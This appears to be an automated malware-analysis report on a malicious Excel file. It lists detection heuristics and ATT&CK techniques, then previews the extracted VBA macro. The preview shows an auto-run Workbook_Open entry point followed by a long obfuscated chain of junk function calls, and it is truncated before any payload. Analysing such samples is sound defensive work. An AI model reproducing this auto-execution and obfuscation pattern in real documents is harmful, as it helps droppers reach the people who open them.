MALICIOUS
210
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The file is an Excel document containing a Workbook_Open VBA macro that utilizes the Shell() function. This indicates an attempt to execute arbitrary commands, commonly used to download and run additional malicious payloads. The ClamAV detection name 'Xls.Malware.Valyria-10036514-0' further supports its malicious nature. The macro's obfuscated nature and the presence of the Shell() call strongly suggest a downloader or dropper functionality.
Heuristics 7
-
ClamAV: Xls.Malware.Valyria-10036514-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Malware.Valyria-10036514-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
-
Callback phishing phone lure medium SE_CALLBACK_LUREDocument asks the user to call a phone number in billing, refund, subscription, fraud, or security context — consistent with callback phishing or tech-support scam patterns. Suppressed for legitimate-issuer (IRS/gov/official-form) documents that carry no urgency or charge/dispute escalation.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.edefter.gov.tr In document text (OLE body)
- http://www.xbrl.org/int/gl/bus/2006-10-25In document text (OLE body)
- http://www.xbrl.org/int/gl/cor/2006-10-25In document text (OLE body)
- http://www.xbrl.org/int/gl/muc/2006-10-25In document text (OLE body)
- http://www.xbrl.org/int/gl/plt/2006-10-25In document text (OLE body)
- http://www.xbrl.org/2003/iso4217In document text (OLE body)
- http://www.xbrl.org/2005/iso639In document text (OLE body)
- http://www.xbrl.org/2003/linkbaseIn document text (OLE body)
- http://www.xbrl.org/2003/instanceIn document text (OLE body)
- http://www.gib.gov.trIn document text (OLE body)
- http://www.ortadogusondaj.comIn document text (OLE body)
- http://www.w3.org/2000/09/xmldsig#In document text (OLE body)
- http://uri.etsi.org/01903/v1.3.2#In document text (OLE body)
- http://www.w3.org/2001/XMLSchema-instanceIn document text (OLE body)
- http://www.w3.org/1999/xlinkIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 111652 bytes |
SHA-256: 58be2706cd19ffe711673aface151069d2919e8615bc27fcd67150a93fe2f4bc |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Worksheet"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Worksheets"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Public Sub WORKBOoK_OPeN(): Call BxXRyBtUEullqxI: End Sub
Static Function BxXRyBtUEullqxI() As Long
Call YWLZgeFDdMFbImw
End Function
Function YWLZgeFDdMFbImw() As Double
Call YbLqaeqCChBbWFv
End Function
Private Function YbLqaeqCChBbWFv() As Currency
Call xsiMYFgWvzgqxbT
End Function
Static Function xsiMYFgWvzgqxbT() As Long
Call MLaGLqStUSrTNsK
End Function
Static Sub MLaGLqStUSrTNsK()
Call lUhqXRnzimiHxuS
End Sub
Function lUhqXRnzimiHxuS() As Boolean
Call CeJxYADIbGFIWst
End Function
Private Sub CeJxYADIbGFIWst()
Call WRsQuUeetVAMayH
End Sub
Static Sub WRsQuUeetVAMayH()
Call oUDlKDYYHqimJcS
End Sub
Static Sub oUDlKDYYHqimJcS()
Call eimMeNZoqKzbEJB
End Sub
Private Sub eimMeNZoqKzbEJB()
Call LyqKnfVGEdxdpkF
End Sub
Private Function LyqKnfVGEdxdpkF() As Double
Call CFJyWoAHJxartyY
End Function
Private Function CFJyWoAHJxartyY() As String
Call lNwKtGaLsSjSmGM
End Function
Sub lNwKtGaLsSjSmGM()
Call rgIcVzHkwkcHtRX
End Sub
Private Sub rgIcVzHkwkcHtRX()
Call pCoRlCiMeCBKpXD
End Sub
Private Function pCoRlCiMeCBKpXD() As Variant
Call xNjxbutXDWFYFOz
End Function
Static Sub xNjxbutXDWFYFOz()
Call wbzAHvzkHpqAKBO
End Sub
Function wbzAHvzkHpqAKBO() As Date
Call FeesMmohBKFniZt
End Function
Private Function FeesMmohBKFniZt() As Object
Call TFmZjYwSEcGrqJB
End Function
Private Function TFmZjYwSEcGrqJB() As Date
Call dBBfDOPATygDXOQ
End Function
Private Function dBBfDOPATygDXOQ() As Byte
Call tTtZqyBXsRrfofI
End Function
Sub tTtZqyBXsRrfofI()
Call SdAJCZWdGliUXhP
End Sub
Private Function SdAJCZWdGliUXhP() As Integer
Call jnbQEImmAFFVxer
End Function
Private Sub jnbQEImmAFFVxer()
Call XJbdJTIQOWLljfq
End Sub
Sub XJbdJTIQOWLljfq()
Call wZGZEtiAOQgfSoR
End Sub
Sub wZGZEtiAOQgfSoR()
Call mopzYDjPxjxTNVB
End Sub
Static Function mopzYDjPxjxTNVB() As Boolean
Call TDtyhWfhLCwVyxE
End Function
Static Sub TDtyhWfhLCwVyxE()
Call YfVCtQhVuTdmvbg
End Sub
Static Function YfVCtQhVuTdmvbg() As Double
Call HnIORiHZdnnNpjU
End Function
Function HnIORiHZdnnNpjU() As Integer
Call zmLQPqRMCJaACdX
End Function
Static Function zmLQPqRMCJaACdX() As Single
Call xHrFfssnlbACyjC
End Function
Static Function xHrFfssnlbACyjC() As Long
Call FTmlVkDyKvDROby
End Function
Sub FTmlVkDyKvDROby()
Call DgCoAlJMOOosTNN
End Sub
Private Function DgCoAlJMOOosTNN() As Object
Call aFqwjOWumgIilCB
End Function
Static Function aFqwjOWumgIilCB()
Call bKpNdOGtLBEjzVB
End Function
Private Function bKpNdOGtLBEjzVB() As Object
Call zbNjbqwOEUjyarY
End Function
Static Sub zbNjbqwOEUjyarY()
Call AYwNkpLzyqqYxrH
End Sub
Private Sub AYwNkpLzyqqYxrH()
Call oDMNaBDrrGlPaLX
End Sub
Static Sub oDMNaBDrrGlPaLX()
Call lahtmJcecHvKzRE
End Sub
Function lahtmJcecHvKzRE() As Currency
Call MbYqOjbWMcwXrAv
End Function
Private Function MbYqOjbWMcwXrAv() As Object
Call szsbIDtCFujATvP
End Function
Private Sub szsbIDtCFujATvP()
Call iOcCcNuSoNApOcy
End Sub
Static Sub iOcCcNuSoNApOcy()
Call PdfAlgqkCgzrzDC
End Sub
Function PdfAlgqkCgzrzDC() As String
Call GkzoToVmGBbEDRV
End Function
Function GkzoToVmGBbEDRV()
Call osmArGvppVlfxZJ
End Function
Private Sub osmArGvppVlfxZJ()
Call vMySSzbPtndVEkU
End Sub
Static Sub vMySSzbPtndVEkU()
Call fMVrFQgExJyVGZs
End Sub
Function fMVrFQgExJyVGZs()
Call AtZnZuOBBZGmPhv
End Function
Private Sub AtZnZuOBBZGmPhv()
Call zGpqEvUOFtrOVUL
End Sub
Static Function zGpqEvUOFtrOVUL() As Byte
Call IKUiJmJLyOGBtsq
End Fu
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.